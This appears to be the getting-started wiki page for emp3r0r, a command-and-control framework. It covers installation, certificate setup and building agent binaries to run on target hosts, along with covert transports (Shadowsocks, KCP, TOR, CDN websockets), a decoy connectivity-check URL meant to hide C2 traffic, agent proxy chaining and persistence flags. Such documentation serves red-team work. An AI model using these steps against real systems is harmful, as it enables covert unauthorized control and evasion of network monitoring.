-
-
Notifications
You must be signed in to change notification settings - Fork 235
Getting started
This program includes a terminal UI, allowing you to navigate through emp3r0r's features and control your targets (agents)
Currently, emp3r0r supports:
- Direct agent to CC connection using HTTP2 via TLS
- Connection through Shadowsocks with optional KCP (convert TCP to UDP) support
- Connection through CDN using Websocket, no external program needed
- Connection through TOR via external TOR proxy
- Connection through upstream proxy server (HTTP, SOCKS, etc.)
Supported platforms: All CPU architectures that Go supports on Linux, and 386 / amd64 on Windows.
Download the latest release from https://github.com/jm33-m0/emp3r0r/releases, emp3r0r-vX.X.X.tar.xz is the one to download.
Extract all files, run ./emp3r0r --install to install emp3r0r to your system. By default it installs to /usr/local/lib/emp3r0r, while the launcher ./emp3r0r itself is copied to /usr/local/bin, meaning the PREFIX variable is set to /usr/local.
If you wish to install emp3r0r to different locations, just run PREFIX=/usr ./emp3r0r --install, substitute /usr with the directory you want to use. Typically, when installing as a user managed software, you are supposed to use /usr/local
, to make it easier to maintain. If you install emp3r0r from a deb package or something similar, it will install to /usr.
After successful installation, you should be able to execute emp3r0r from your current shell, the C2 UI will show if you have tmux installed.
On the first run, emp3r0r launcher script will generate CA and C2 server certificates, you will need to input desired C2 server names, they will be used by agents for server identification. If you plan to use your C2 server for more than one IPs or domains, you should input them like example.com 192.168.0.1 TOROnionSiteName.onion
If you intend to make the server certificate valid for multiple domains/IPs (for example, a TOR domain and a normal domain), you can do that by adding multiple C2 addresses when prompted.
There's nothing to configure, when C2 is started, type gen_agent to generate an agent binary, follow on-screen instructions.
Shadowsocks is well-known by users living under heavily-censored Internet (China, Iran, etc). It basically erases everything that can be used as identifier of its traffic, in other words, it tries to defeat DPI. When you enable Shadowsocks in your emp3r0r agent, the C2 traffic will appear as encrypted TCP traffic, completely random and hard to find by traffic monitoring systems.
KCP exists to optimize your connection quality, as it says on its homepage
Millions of devices(from low-end MIPS routers to high-end servers) have deployed kcp-go powered program in a variety of forms like online games, live broadcasting, file synchronization and network acceleration.
Seems quite useful for C2s as well, doesn't it?
KCP converts C2 traffic to UDP and encrypt/obfuscate it just like Shadowsocks does. When UDP is not restricted in your target network, KCP can dramatically improve the C2 connection quality, and as a bonus, be stateless (a key feature of UDP).
KCP can be optionally enabled when you enable Shadowsocks.
emp3r0r will generate randomized Shadowsocks configs for you automatically.
To use TOR, you have to set up a hidden service first
Note: TOR hidden service doesn't need a public IP address to work, you can just run your service from anywhere
Assuming your hidden service is configured as:
# /etc/tor/torrc
HiddenServiceDir /var/lib/tor/hidden_service/
# assuming 8000 is C2 port
# do NOT change 443 to other port numbers
HiddenServicePort 443 127.0.0.1:8000
TOR domain name:
❯ sudo cat /var/lib/tor/hidden_service/hostname
cc.onionWhen generating C2 server certificate, make sure you include the onion address.
To generate an agent that uses the onion address as C2, type gen_agent and set C2 address accordingly.
First you need a CDN that can forward websocket traffic for you. FYI, Cloudflare can do that.
I assume you already knew how to configure a CDN for your website. Here we put our CC server behind Nginx:
HTTP2 websocket in TLS websocket websocket HTTP2
agent -------> socks5 ------------------> CDN -----------> Nginx ----------> CC websocket server -------> CC
Nginx config:
# NOTE In `http://127.0.0.1:9000/ws`, `/ws` is hard coded in emp3r0r C2
location /emp3r0r {
proxy_pass http://127.0.0.1:9000/ws;
proxy_redirect off;
proxy_http_version 1.1;
proxy_set_header Upgrade $http_upgrade;
proxy_set_header Connection "upgrade";
proxy_set_header Host $http_host;
# Show realip
proxy_set_header X-Real-IP $remote_addr;
proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
}
Likewise, make sure the C2 address is set when generating certificates and when using gen_agent.
To run CC server with CDN support enabled:
emp3r0r -cdn2proxy 9000 # 9000 is the listening port of websocket serverIn emp3r0r's console, type use gen_agent to build agent binaries, follow on-screen instructions:
- Configure the options to meet your needs using
set <opt> <value>command. - Typically you will need to modify
cc_hostto desired value, for exampleset cc_host my_cc.com, port is not needed since it's randomly generated (can be adjusted viaemp3r0r.json) - After done with configurations, type
runto generate the agent binary
Run the generated agent binary (under ~/.emp3r0r) on target host.
When the target is connected, type upgrade_agent, the target will reconnect with the new version.
This is a URL that works like Windows's NCSI connectivity check, it's designed to hide the actual C2 traffic.
You can configure this URL to some legit site such as https://github.com/jm33-m0/emp3r0r, or some other sites that are considered legit in your target network.
When this option is enabled, agents will request the pre-configured URL, expecting to find a certain text pattern in server's response, when it's found, agents continue to connect to the actual C2 server, if not found, agents will sleep for a pre-configured time span and repeat the process.
You can specify (hardcode) a proxy address into your agent binary when using gen_agent, this proxy is used by HTTP2 C2 connection.
Use UDP broadcasting to communicate and form proxy chain to gain Internet access (so they can connect back to C2).
Can be disabled if you don't want the agent to send noisy UDP traffic
(you can adjust the time interval via broadcast_interval_min and broadcast_interval_max as well)
This is not a build-time option, but since I have mentioned auto-proxy, I will explain this as well.
This works like ssh -R, one connected agent initiates a connection towards another agent (that cannot send outbound traffic), and use that connection to provide SOCKS5 proxy for target agent so it can reach C2.
emp3r0r @local (run_proxy) > use bring2cc
2023/04/21 10:47:04 Using module "bring2cc"
Bring a target host to CC by connecting to it first (target host must have agent installed)
+--------+----------------------+----------+
| OPTION | HELP | VALUE |
+--------+----------------------+----------+
| module | Selected module | bring2cc |
+--------+----------------------+----------+
| target | Selected target | <blank> |
+--------+----------------------+----------+
| addr | Target host to proxy | <blank> |
| | , we will connect to | |
| | it and proxy it out | |
+--------+----------------------+----------+
Use DNS over HTTPS in agent, to secure our DNS requests, you can opt out if this is not a concern or DoH is unavailable
To run agent with direct connection to CC server, just ./agent, if you want more control, configure them in gen_agent
Likewise, build the agent with onion domain name as CC host.
To run agent, you have to run TOR proxy first, I have a static tor binary for you
On your target, run ./agent, it will automatically use TOR proxy (socks5://127.0.0.1:9050)
Or if you want to use a different TOR proxy, set a C2 transport proxy when using gen_agent
Same build proccess, use your domain name as CC IP
Set CDN proxy to something like wss://example.com/emp3r0r when using gen_agent.
-
VERBOSE=trueto enable logging for agent -
PERSISTENT=trueto prevent self-deleting -
ELVSH=TRUEto run agent binary as interactiveelvshshell -
REPLACE_AGENT=trueor-replaceto replace existing agent process (if applicable) -
-versionto view agent version